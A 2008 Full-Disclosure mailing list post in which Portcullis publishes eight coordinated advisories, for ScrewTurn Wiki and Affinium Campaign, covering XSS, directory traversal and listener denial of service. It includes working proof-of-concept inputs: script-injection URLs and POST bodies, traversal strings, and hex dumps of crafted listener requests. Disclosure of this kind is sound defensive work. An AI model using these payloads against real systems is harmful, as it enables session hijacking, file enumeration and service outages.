[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Advisories
- To: <moderators@xxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxxx>, <vuln@xxxxxxxxxxx>, <news@xxxxxxxxxxxxxx>
- Subject: [Full-disclosure] Advisories
- From: "advisories" <advisories@xxxxxxxxxxxxxxxxxxxxxxx>
- Date: Wed, 30 Jul 2008 07:58:16 +0100
Hello
Please find attached advisories to be published.
Kind Regards
Advisories
Portcullis Computer Security Ltd
###############################################################
This email originates from the systems of Portcullis
Computer Security Limited, a Private limited company,
registered in England in accordance with the Companies
Act under number 02763799. The registered office
address of Portcullis Computer Security Limited is:
The Grange Barn, Pikes End, Pinner, MIDDX,
United Kingdom, HA5 2EX.
The information in this email is confidential and may be
legally privileged. It is intended solely for the addressee.
Any opinions expressed are those of the individual and
do not represent the opinion of the organisation. Access
to this email by persons other than the intended recipient
is strictly prohibited.
If you are not the intended recipient, any disclosure,
copying, distribution or other action taken or omitted to be
taken in reliance on it, is prohibited and may be unlawful.
When addressed to our clients any opinions or advice
contained in this email is subject to the terms and
conditions expressed in the applicable Portcullis Computer
Security Limited terms of business.
###############################################################
#####################################################################################
This e-mail message has been scanned for Viruses and Content and cleared
by MailMarshal.
#####################################################################################
Portcullis Security Advisory 08_008
Vulnerable System:
ScrewTurn Wiki (www.screwturn.eu).
Vulnerability Title:
Permanent Cross-site Scripting in the "System Log" page.
Vulnerability Discovery And Development:
Portcullis Security Testing Services.
Credit For Discovery:
Ferruh Mavituna - Portcullis Computer-Security Ltd.
Affected systems:
ScrewTurn Wiki 2.0.29 and 2.0.30 confirmed.
Potentially all older versions as well although, this has not been confirmed.
Details:
Following a request to any page will cause an error log because of the ASP.NET
Request Validation.
http://example.com/?<script>alert('XSS')</script>
This error will then be visible in the "/admin.aspx - System Log" page as
unfiltered.
Impact:
High, it is possible to hijack the admin session and from the admin panel it is
possible to run .NET code via a plugin feature or to manage the whole
application. The exploit does not require any authentication.
Exploit:
A <script>alert('XSS')</script> request to any page in the application.
Vendor Status:
Vendor contacted, who advised that the vulnerability has been fixed in version
2.0.31.
Copyright:
Copyright © Portcullis Computer Security Limited 2008, All rights reserved
worldwide.
Permission is hereby granted for the electronic redistribution of this
information. It is not to be edited or altered in any way without the express
written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are NO
warranties, implied or otherwise, with regard to this information or its use.
Any use of this information is at the user's risk. In no event shall the
author/distributor (Portcullis Computer Security Limited) be held liable for
any damages whatsoever arising out of or in connection with the use or spread
of this information.Portcullis Security Advisory - 08-005
Vulnerable System:
Affinium Campaign
Vulnerability Title:
The web application's parameters are vulnerable to reflected JavaScript
injection.
Vulnerability Discovery And Development:
Portcullis Security Testing Services.
Credit For Discovery:
Tim Brown - Portcullis Computer-Security Ltd.
Affected systems:
All known versions of Affinium Campaign; the vulnerability discovered was for
version 7.2.1.0.55.
Details:
It is possible for an attacker to inject JavaScript by manipulating various
parameters such that the the JavaScript from the manipulated request is
returned in the response. Example URLs that trigger this behaviour include:
* https://webserver/Campaign/campaignDetails.do?id=%3Cscript%3Ealert('xss')
%3C/script%3E
* https://webserver/Campaign/offerDetails.do?id=%3Cscript%3Ealert('xss')%3C
/script%3E
* https://webserver/Campaign/Campaign?function=%3Cscript%3Ealert('xss')%3C/
script%3E
* https://webserver/Campaign/runAllFlowchart.do?sessionID=%3Cscript%3Ealert
(document.cookie)%3C/script%3E
* https://webserver/Campaign/updateOfferTemplatePage.do?actionType=edit&id
=%3Cscript%3Ealert('xss')%3C/script%3E
* https://webserver/Campaign/Campaign?function=LoadFrame&Frame=3Cscript%3
Ealert('xss')%3C/script%3E
In many of these cases the web application fails, when attempting to parse the
JavaScript as an integer. The resultant error page includes details of the
exception thrown including the malformed input containing the injected
JavaScript.
Of particular concern are the following example URLs which when requested,
result in the JavaScript being returned in the login page itself:
*
https://webserver/manager/jsp/test.jsp?affiniumUserName=%22%3E%3Cscript%3Ealert
('xss')%3C/script%3E
* https://webserver/Campaign/main.do?affiniumUserName=%22%3E%3Cscript%3Ealert
('xss')%3C/script%3E
It is worth considering that there may well be other instances where similar
exceptions may be raised and these are also likely to be vulnerable.
Impact:
An attacker would be able to use this to execute malicious code on a visitors
computers.
Exploit:
Exploit code is not required.
Vendor Status:
05/06/2008 - vendor informed
10/06/2008 - Vendor updated
11/06/2008 - Vendor responded via email
16/07/2008 - Vendor confirmed patches
Copyright:
Copyright © Portcullis Computer Security Limited 2008, All rights reserved
worldwide.
Permission is hereby granted for the electronic redistribution of this
information. It is not to be edited or altered in any way without the express
written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are NO
warranties, implied or otherwise, with regard to this information or its use.
Any use of this information is at the user's risk. In no event shall the
author/distributor (Portcullis Computer Security Limited) be held liable for
any damages whatsoever arising out of or in connection with the use or spread
of this information.Portcullis Security Advisory - 08-001
Vulnerable System:
Affinium Campaign
Vulnerability Title:
The web application's bookmarks web page is vulnerable to a JavaScript
injection.
Vulnerability Discovery And Development:
Portcullis Security Testing Services.
Credit For Discovery:
Tim Brown - Portcullis Computer-Security Ltd.
Affected systems:
All known versions of Affinium Campaign; the vulnerability discovered was for
version 7.2.1.0.55.
Details:
It is possible for an attacker to inject JavaScript into the bookmarks web page
by manipulating the PageName and url parameters of requests to
https://webserver/Campaign/Campaign. For example:
POST /Campaign/Campaign HTTP/1.1
Host: webserver
Cookies:
ADMINCONSOLESESSION=HJvLfMGn2KaCJDzcHvv0pbMCldhZNd8vd29g546JL028wcPF08ht!890790959;
AMSSESSIONID=HJQKGLYD3jy0BaBckv1G2J1Jh0TJqC8fMp9abvmxG7Ryf0cCJ0Jg!890790959;
CAMPAIGNSESSIONID=HJaAjn2Kv99LTaXQ2QZnhNT2nh5VQXSYpSmmf0l1KFLBFnFzVvv5!890790959
Content-Type: application/x-www-form-urlencoded
Content-length: 169
PageName=" onmouseover="javascript:alert('xss')"
name="&url=javascript%3Aalert%28%27xss%27%29&function=CustomBookMarkLink&cmd=add&CustomBookmarkFrame=CustomBookmarkReply
The application will accept JavaScript: style URLs. In addition, by injecting
into the title field, the input is sanitised on the main page, although it is
executed when the bookmark is edited.
Impact:
An attacker would be able to use this to execute malicious code on a visitors
computers.
Exploit:
Exploit code is not required.
Vendor Status:
05/06/2008 - vendor informed
10/06/2008 - Vendor updated
11/06/2008 - Vendor responded via email
16/07/2008 - Vendor confirmed patches
Copyright:
Copyright © Portcullis Computer Security Limited 2008, All rights reserved
worldwide.
Permission is hereby granted for the electronic redistribution of this
information. It is not to be edited or altered in any way without the express
written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are NO
warranties, implied or otherwise, with regard to this information or its use.
Any use of this information is at the user's risk. In no event shall the
author/distributor (Portcullis Computer Security Limited) be held liable for
any damages whatsoever arising out of or in connection with the use or spread
of this information.Portcullis Security Advisory - 08-002
Vulnerable System:
Affinium Campaign
Vulnerability Title:
The web application's create a new folder functionality is vulnerable to a
directory traversal.
Vulnerability Discovery And Development:
Portcullis Security Testing Services.
Credit For Discovery:
Neil Kettle and Tim Brown - Portcullis Computer-Security Ltd.
Affected systems:
All known versions of Affinium Campaign; the vulnerability discovered was for
version 7.2.1.0.55.
Details:
It is possible for an attacker to traverse the directory structure and break
out of the application imposed sandbox by manipulating requests to create a new
folder and altering the folder name to include ../../../../../../../../../,
allowing the creation of directories in locations such as /tmp and /var/tmp.
Furthermore, it was then possible to create files with arbitrary filenames in
those locations.
Impact:
An attacker would be able to use this to create or modify configuration files
in sensitive locations.
Exploit:
Exploit code is not required.
Vendor Status:
05/06/2008 - vendor informed
10/06/2008 - Vendor updated
11/06/2008 - Vendor responded via email
16/07/2008 - Vendor confirmed patches
Copyright:
Copyright © Portcullis Computer Security Limited 2008, All rights reserved
worldwide.
Permission is hereby granted for the electronic redistribution of this
information. It is not to be edited or altered in any way without the express
written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are NO
warranties, implied or otherwise, with regard to this information or its use.
Any use of this information is at the user's risk. In no event shall the
author/distributor (Portcullis Computer Security Limited) be held liable for
any damages whatsoever arising out of or in connection with the use or spread
of this information.
Portcullis Security Advisory - 08-006
Vulnerable System:
Affinium Campaign
Vulnerability Title:
The Listener is vulnerable to directory traversal.
Vulnerability Discovery And Development:
Portcullis Security Testing Services.
Credit For Discovery:
Tim Brown - Portcullis Computer-Security Ltd.
Affected systems:
All known versions of Affinium Campaign; the vulnerability discovered was for
version 7.2.1.0.55.
Details:
It is possible for an attacker to traverse the directory structure and break
out of the application imposed sandbox by manipulating requests from the web
application's ActiveX control which encapsulates binary data within a HTTP POST
request to https://webserver/Campaign/CampaignListener. Since the
CampaignListener web page is expecting binary data, no attempt to validate the
input is made prior to passing it to the listener server. For example:
00000000 50 4f 53 54 20 2f 43 61 6d 70 61 69 67 6e 2f 43 |POST /Campaign/C|
00000010 61 6d 70 61 69 67 6e 4c 69 73 74 65 6e 65 72 3f |ampaignListener?|
00000020 43 6c 69 65 6e 74 49 44 3d 31 20 48 54 54 50 2f |ClientID=1 HTTP/|
00000030 31 2e 31 0d 0a 48 6f 73 74 3a 20 77 65 62 73 65 |1.1..Host: webse|
00000040 72 76 65 72 0d 0a 43 6f 6f 6b 69 65 3a 20 55 6e |rver..Cookie: Un|
00000050 69 63 61 44 65 66 61 75 6c 74 43 61 74 61 6c 6f |icaDefaultCatalo|
00000060 67 3d 44 52 5f 54 65 73 74 2e 63 61 74 3b 20 43 |g=DR_Test.cat; C|
00000070 41 4d 50 41 49 47 4e 53 45 53 53 49 4f 4e 49 44 |AMPAIGNSESSIONID|
00000080 3d 48 41 5a 51 74 36 50 6c 6b 56 38 34 4c 62 32 |=HAZQt6PlkV84Lb2|
00000090 70 46 53 37 58 77 4d 6d 62 4c 41 31 76 4d 6e 74 |pFS7XwMmbLA1vMnt|
000000a0 6e 50 38 6d 4c 47 41 68 31 47 79 59 43 76 30 6e |nP8mLGAh1GyYCv0n|
000000b0 44 37 79 6b 34 21 37 30 37 36 33 30 32 33 39 0d |D7yk4!707630239.|
000000c0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a |.Content-Length:|
000000d0 20 32 32 39 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 | 229..Content-Ty|
000000e0 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f |pe: multipart/fo|
000000f0 72 6d 2d 64 61 74 61 0d 0a 0d 0a e1 00 00 00 01 |rm-data....á....|
00000100 00 02 07 08 00 00 00 01 01 00 00 00 12 00 00 00 |................|
00000110 0d 01 00 00 00 00 01 01 00 00 00 01 00 00 00 01 |................|
00000120 01 00 00 00 17 00 00 00 12 09 00 00 00 53 46 69 |.............SFi|
00000130 6c 65 53 79 73 00 01 01 00 00 00 01 00 00 00 04 |leSys...........|
00000140 97 00 00 00 00 00 00 00 42 00 00 00 00 00 46 00 |........B.....F.|
00000150 00 00 2f 65 74 63 00 00 00 00 00 00 00 00 00 00 |../etc..........|
00000160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000190 00 00 00 00 00 00 00 00 00 3c 00 00 00 2f 61 70 |.........<.../ap|
000001a0 70 73 2f 75 6e 69 63 61 2f 61 66 66 69 6e 69 75 |ps/unica/affiniu|
000001b0 6d 2f 41 66 66 69 6e 69 75 6d 2f 43 61 6d 70 61 |m/Affinium/Campa|
000001c0 69 67 6e 2f 70 61 72 74 69 74 69 6f 6e 73 2f 70 |ign/partitions/p|
000001d0 61 72 74 69 74 69 6f 6e 31 00 42 00 00 00 00 00 |artition1.B.....|
000001e0 0d 0a |..|
Results in the following being returned;
... snipped for brevity ...
00001200 00 00 01 00 00 00 41 41 06 00 00 00 70 61 73 73 |......AA....pass|
00001210 77 64 00 fb 66 60 c9 14 09 00 00 00 00 00 00 01 |wd.ûf`É.........|
00001220 00 00 00 41 41 04 00 00 00 70 69 6e 67 00 d7 8c |...AA....ping.×.|
00001230 92 c5 82 7d 00 00 00 00 00 00 01 00 00 00 41 41 |.Å.}..........AA|
00001240 0c 00 00 00 70 6f 6c 69 63 79 64 2e 63 6f 6e 66 |....policyd.conf|
00001250 00 8a 46 3a c5 b0 08 00 00 00 00 00 00 01 00 00 |..F:Å°..........|
00001260 00 41 41 0d 00 00 00 70 72 65 73 65 72 76 65 2e |.AA....preserve.|
00001270 6c 69 73 74 00 6f 47 3a c5 c4 04 00 00 00 00 00 |list.oG:ÅÄ......|
00001280 00 01 00 00 00 41 41 07 00 00 00 70 72 6f 66 69 |.....AA....profi|
00001290 6c 65 00 45 c7 d8 c5 d8 0f 00 00 00 00 00 00 01 |le.EÇØÅØ........|
000012a0 00 00 00 41 41 0b 00 00 00 70 72 6f 66 69 6c 65 |...AA....profile|
000012b0 2e 61 77 73 00 6f 6c c4 c5 58 02 00 00 00 00 00 |.aws.olÄÅX......|
000012c0 00 01 00 00 00 41 41 0d 00 00 00 70 72 6f 66 69 |.....AA....profi|
000012d0 6c 65 2e 62 61 6b 75 70 00 0b 6f 44 c5 7f 09 00 |le.bakup..oDÅ...|
000012e0 00 00 00 00 00 01 00 00 00 41 41 0b 00 00 00 70 |.........AA....p|
000012f0 72 6f 66 69 6c 65 2e 75 6e 69 00 5a 71 c4 c5 be |rofile.uni.ZqÄž|
00001300 01 00 00 00 00 00 00 01 00 00 00 41 41 09 00 00 |...........AA...|
00001310 00 70 72 6f 74 6f 63 6f 6c 73 00 8a 46 3a c5 ba |.protocols..F:ź|
00001320 26 00 00 00 00 00 00 01 00 00 00 41 41 08 00 00 |&..........AA...|
00001330 00 70 73 65 2e 63 6f 6e 66 00 df 44 3a c5 fc 0c |.pse.conf.ßD:Åü.|
00001340 00 00 00 00 00 00 01 00 00 00 41 41 0d 00 00 00 |..........AA....|
00001350 70 73 65 5f 74 75 6e 65 2e 63 6f 6e 66 00 df 44 |pse_tune.conf.ßD|
... snipped for brevity ...
Impact:
An attacker would be able to use this to list files in sensitive locations.
Whilst it was not conclusively proven, it may also be possible to execute map
existing files such as /etc/passwd to Affinumum Campaign tables and execute
arbitrary commands by the further manipulation of requests from the ActiveX
control to the CampaignListener web page.
Exploit:
Exploit code is not required.
Vendor Status:
05/06/2008 - vendor informed
10/06/2008 - Vendor updated
11/06/2008 - Vendor responded via email
16/07/2008 - Vendor confirmed patches
Copyright:
Copyright © Portcullis Computer Security Limited 2008, All rights reserved
worldwide.
Permission is hereby granted for the electronic redistribution of this
information. It is not to be edited or altered in any way without the express
written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are NO
warranties, implied or otherwise, with regard to this information or its use.
Any use of this information is at the user's risk. In no event shall the
author/distributor (Portcullis Computer Security Limited) be held liable for
any damages whatsoever arising out of or in connection with the use or spread
of this information.
Portcullis Security Advisory - 08-007
Vulnerable System:
Affinium Campaign
Vulnerability Title:
The listener is vulnerable to Denial of Service.
Vulnerability Discovery And Development:
Portcullis Security Testing Services.
Credit For Discovery:
Neil Kettle and Tim Brown - Portcullis Computer-Security Ltd.
Affected systems:
All known versions of Affinium Campaign; the vulnerability discovered was for
version 7.2.1.0.55.
Details:
Whilst it was not possible to confirm the exact nature of the vulnerability, it
is believed that on connecting to the listener server, that a four byte length
value is accepted which is used in calculations relating to memory allocations.
By specifying an invalid value for this, the server fails when
allocating/accessing memory. Note: In reproducing this, connections were
spawned which sent a four byte value which was incremented on each connection
until the server crashed.
Similar issues can also be triggered from the web application which is
typically deployed in front of the listener server. In this case the
application makes use of an ActiveX control which encapsulates binary data
within an HTTP POST request to http://webserver/Campaign/CampaignListener.
Since the CampaignListener web page is expecting binary data, no attempt to
validate the input is made prior to passing it to the listener server. It was
identified that again length encoding was used and as with the direct
connection, manipulation of these length fields could affect memory allocation.
For example, by specifying invalid two byte length values, the server can be
made to fail when allocating memory. For example:
00000000 50 4f 53 54 20 2f 43 61 6d 70 61 69 67 6e 2f 43 |POST /Campaign/C|
00000010 61 6d 70 61 69 67 6e 4c 69 73 74 65 6e 65 72 3f |ampaignListener?|
00000020 43 6c 69 65 6e 74 49 44 3d 35 20 48 54 54 50 2f |ClientID=5 HTTP/|
00000030 31 2e 31 0d 0a 48 6f 73 74 3a 20 77 65 62 73 65 |1.1..Host: webse|
00000040 72 76 65 72 0d 0a 43 6f 6f 6b 69 65 3a 20 43 41 |rver..Cookie: CA|
00000050 4d 50 41 49 47 4e 53 45 53 53 49 4f 4e 49 44 3d |MPAIGNSESSIONID=|
00000060 48 56 73 62 47 35 70 6e 44 37 52 6c 79 67 6e 43 |HVsbG5pnD7RlygnC|
00000070 38 64 74 4e 56 50 76 50 43 51 56 57 32 37 78 54 |8dtNVPvPCQVW27xT|
00000080 4c 63 76 79 36 51 57 63 51 51 4c 51 32 51 52 52 |Lcvy6QWcQQLQ2QRR|
00000090 46 56 57 76 21 31 33 36 34 35 35 34 39 33 34 0d |FVWv!1364554934.|
000000a0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a |.Content-Length:|
000000b0 20 32 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 | 296..Content-Ty|
000000c0 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f |pe: multipart/fo|
000000d0 72 6d 2d 64 61 74 61 0d 0a 0d 0a 1f 01 00 00 01 |rm-data.........|
000000e0 00 02 07 0c 00 00 00 01 01 00 00 00 03 00 00 00 |................|
000000f0 12 0c 00 00 00 75 6e 69 63 61 5f 61 63 73 76 72 |.....unica_acsvr|
00000100 00 12 73 00 00 00 2f 61 70 70 73 2f 75 6e 69 63 |..s.../apps/unic|
00000110 61 2f 61 66 66 69 6e 69 75 6d 2f 41 66 66 69 6e |a/affinium/Affin|
00000120 69 75 6d 2f 43 61 6d 70 61 69 67 6e 2f 70 61 72 |ium/Campaign/par|
00000130 74 69 74 69 6f 6e 73 2f 70 61 72 74 69 74 69 6f |titions/partitio|
00000140 6e 31 2f 63 61 6d 70 61 69 67 6e 73 2f 41 41 41 |n1/campaigns/AAA|
00000150 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
*
00000170 41 41 41 41 41 41 41 41 00 04 2a 00 00 00 0e f2 |AAAAAAAA..*....ò|
00000180 95 47 51 57 f2 00 00 00 00 00 14 00 00 00 01 29 |.GQWò..........)|
00000190 d5 1b 4f 5f 75 72 f9 00 66 3c 62 8a b8 d6 c3 a6 |Õ.O_urù.f<b.¸Öæ|
000001a0 4f 63 00 00 00 00 00 00 12 0b 00 00 00 70 61 72 |Oc...........par|
000001b0 74 69 74 69 6f 6e 31 00 12 00 00 00 00 12 0e 00 |tition1.........|
000001c0 00 00 31 32 30 31 30 30 37 38 37 31 32 39 38 00 |..1201007871298.|
000001d0 05 01 00 00 00 00 00 00 00 05 01 00 00 00 00 00 |................|
000001e0 00 00 05 01 00 00 00 02 00 00 00 12 03 00 00 00 |................|
000001f0 2d 6c 00 12 06 00 00 00 65 6e 5f 55 53 00 41 41 |-l......en_US.AA|
00000200 d3 4d 00 0d 0a |ÓM...|
The status log included the following line detailing the Denial of Service:
01/22/2008 13:48:13.220 [E] [MEMORY] SBRK value: 20ab2d50; _end: 200a2974;
difference: 10552284 [hmem:2101]
01/22/2008 13:48:13.220 [E] [MEMORY] OUT OF MEMORY: Unable to REALLOCATE
1305706496 bytes. [hmem:2404]
1305706496 can be expressed as 0x4dd38000 in hexidecimal. Once endian and
encoding issues have been accounted for, the top two bytes correspond to our
invalid two byte length value of 0xd34d (see 0x200).
Impact:
An attacker would be able to cause a Denial of Service.
Exploit:
Exploit code is not required.
Vendor Status:
05/06/2008 - vendor informed
10/06/2008 - Vendor updated
11/06/2008 - Vendor responded via email
16/07/2008 - Vendor confirmed patches
Copyright:
Copyright © Portcullis Computer Security Limited 2008, All rights reserved
worldwide.
Permission is hereby granted for the electronic redistribution of this
information. It is not to be edited or altered in any way without the express
written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are NO
warranties, implied or otherwise, with regard to this information or its use.
Any use of this information is at the user's risk. In no event shall the
author/distributor (Portcullis Computer Security Limited) be held liable for
any damages whatsoever arising out of or in connection with the use or spread
of this information.
Portcullis Security Advisory - 08-004
Vulnerable System:
Affinium Campaign
Vulnerability Title:
The web application's status log web page is vulnerable to a second order
JavaScript injection.
Vulnerability Discovery And Development:
Portcullis Security Testing Services.
Credit For Discovery:
Tim Brown - Portcullis Computer-Security Ltd.
Affected systems:
All known versions of Affinium Campaign; the vulnerability discovered was for
version 7.2.1.0.55.
Details:
It is possible for an attacker to inject JavaScript into the web application
which is typically deployed in front of the listener server by manipulating
requests from the web application's ActiveX control which encapsulates binary
data within an HTTP POST request to
https://webserver/Campaign/CampaignListener. The status log contains the
requests made to the CampaignListener web page along with the results of any
such requests. Since the CampaignListener web page is expecting binary data, no
attempt to validate the input is made prior to passing it to the listener
server. When an authenticated administrative user visits the status logs web
page, the JavaScript from the manipulated ActiveX control request is returned
in the response. For example:
00000000 50 4f 53 54 20 2f 43 61 6d 70 61 69 67 6e 2f 43 |POST /Campaign/C|
00000010 61 6d 70 61 69 67 6e 4c 69 73 74 65 6e 65 72 3f |ampaignListener?|
00000020 43 6c 69 65 6e 74 49 44 3d 36 20 48 54 54 50 2f |ClientID=6 HTTP/|
00000030 31 2e 31 0d 0a 48 6f 73 74 3a 20 77 65 62 73 65 |1.1..Host: webse|
00000040 72 76 65 72 0d 0a 43 6f 6f 6b 69 65 3a 20 43 41 |rver..Cookie: CA|
00000050 4d 50 41 49 47 4e 53 45 53 53 49 4f 4e 49 44 3d |MPAIGNSESSIONID=|
00000060 48 57 57 43 54 4c 6d 58 59 54 64 6d 50 6e 68 50 |HWWCTLmXYTdmPnhP|
00000070 41 76 4a 59 54 78 66 54 73 76 41 6e 41 78 68 79 |AvJYTxfTsvAnAxhy|
00000080 54 5a 50 7a 6b 34 6a 43 47 38 47 52 44 51 57 6b |TZPzk4jCG8GRDQWk|
00000090 42 36 6e 5a 21 37 30 37 36 33 30 32 33 39 0d 0a |B6nZ!707630239..|
000000a0 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 |Content-Length: |
000000b0 32 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 |291..Content-Typ|
000000c0 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 |e: multipart/for|
000000d0 6d 2d 64 61 74 61 0d 0a 0d 0a 1f 01 00 00 01 00 |m-data..........|
000000e0 02 07 0c 00 00 00 01 01 00 00 00 03 00 00 00 12 |................|
000000f0 0c 00 00 00 75 6e 69 63 61 5f 61 63 73 76 72 00 |....unica_acsvr.|
00000100 12 73 00 00 00 3c 73 63 72 69 70 74 3e 61 6c 65 |.s...<script>ale|
00000110 72 74 28 27 78 73 73 27 29 3c 2f 73 63 72 69 70 |rt('xss')</scrip|
00000120 74 3e 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |t>AAAAAAAAAAAAAA|
00000130 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
*
00000170 41 41 41 41 41 41 41 00 04 2a 00 00 00 0e f2 95 |AAAAAAA..*....ò.|
00000180 47 51 57 f2 00 00 00 00 00 14 00 00 00 01 29 d5 |GQWò..........)Õ|
00000190 1b 4f 5f 75 72 f9 00 66 3c 62 8a b8 d6 c3 a6 4f |.O_urù.f<b.¸ÖæO|
000001a0 63 00 00 00 00 00 00 12 0b 00 00 00 70 61 72 74 |c...........part|
000001b0 69 74 69 6f 6e 31 00 12 00 00 00 00 12 0e 00 00 |ition1..........|
000001c0 00 31 32 30 31 30 30 37 38 37 31 32 39 38 00 05 |.1201007871298..|
000001d0 01 00 00 00 00 00 00 00 05 01 00 00 00 00 00 00 |................|
000001e0 00 05 01 00 00 00 02 00 00 00 12 03 00 00 00 2d |...............-|
000001f0 6c 00 12 06 00 00 00 65 6e 5f 55 53 00 0d 0a |l......en_US...|
Impact:
An attacker would use this to execute malicious code on a visitors computers.
Exploit:
Exploit code is not required.
Vendor Status:
05/06/2008 - vendor informed
10/06/2008 - Vendor updated
11/06/2008 - Vendor responded via email
16/07/2008 - Vendor confirmed patches
Copyright:
Copyright © Portcullis Computer Security Limited 2008, All rights reserved
worldwide.
Permission is hereby granted for the electronic redistribution of this
information. It is not to be edited or altered in any way without the express
written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are NO
warranties, implied or otherwise, with regard to this information or its use.
Any use of this information is at the user's risk. In no event shall the
author/distributor (Portcullis Computer Security Limited) be held liable for
any damages whatsoever arising out of or in connection with the use or spread
of this information.Portcullis Security Advisory - 08-003
Vulnerable System:
Affinium Campaign
Vulnerability Title:
The web application's templates web page is vulnerable to a JavaScript
injection.
Vulnerability Discovery And Development:
Portcullis Security Testing Services.
Credit For Discovery:
Tim Brown - Portcullis Computer-Security Ltd.
Affected systems:
All known versions of Affinium Campaign; the vulnerability discovered was for
version 7.2.1.0.55.
Details:
It is possible for an attacker to inject JavaScript into the templates web page
by manipulating the displayIcon parameter of requests to
https://webserver/Campaign/updateOfferTemplateSubmit.do. For example:
POST https://webserver/Campaign/updateOfferTemplateSubmit.do?action=finish
HTTP/1.1
Host: webserver
Cookie:
CAMPAIGNSESSIONID=HXJBBgzXJdYp1w1klLbQhwycZZ7pQxYyG1af33hRkXtJ1P9CTnMz!707630239
Content-Type: application/x-www-form-urlencoded
Content-Length: 818
createStep=3&offerTemplateID=2&actionType=edit&isInUse=false&offerTemplateName=TemplateName&description=Description&suggestedUsage=SuggestedUsage&displayIcon=%22+onerror%3Djavascript%3Aalert%28%2FXSS%2F%29+onload%3Djavascript%3Aalert%28%2FXSS%2F%29+foo%3D%22&offerCodeCodeFmt1=nnnnnnnnn&offerCodeCodeFmt2=&offerCodeCodeFmt3=&offerCodeCodeFmt4=&offerCodeCodeFmt5=&offerCodeGenerator=uacoffercodegen&treatmentCodeGenerator=++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&treatmentCodeFmt=nnnnnnnnn&offerListSelect=STATIC&offerListSelect=HIDDEN_STATIC&offerListSelect=PARAMETERIZED&policyId=100&updateEnumAttributeID=
The JavaScript from the manipulated request is returned in the response and
executed when the browser tries to load the display icon.
Impact:
An attacker would be able to use this to execute malicious code on a visitors
computers.
Exploit:
Exploit code is not required.
Vendor Status:
05/06/2008 - vendor informed
10/06/2008 - Vendor updated
11/06/2008 - Vendor responded via email
16/07/2008 - Vendor confirmed patches
Copyright:
Copyright © Portcullis Computer Security Limited 2008, All rights reserved
worldwide.
Permission is hereby granted for the electronic redistribution of this
information. It is not to be edited or altered in any way without the express
written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are NO
warranties, implied or otherwise, with regard to this information or its use.
Any use of this information is at the user's risk. In no event shall the
author/distributor (Portcullis Computer Security Limited) be held liable for
any damages whatsoever arising out of or in connection with the use or spread
of this information.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/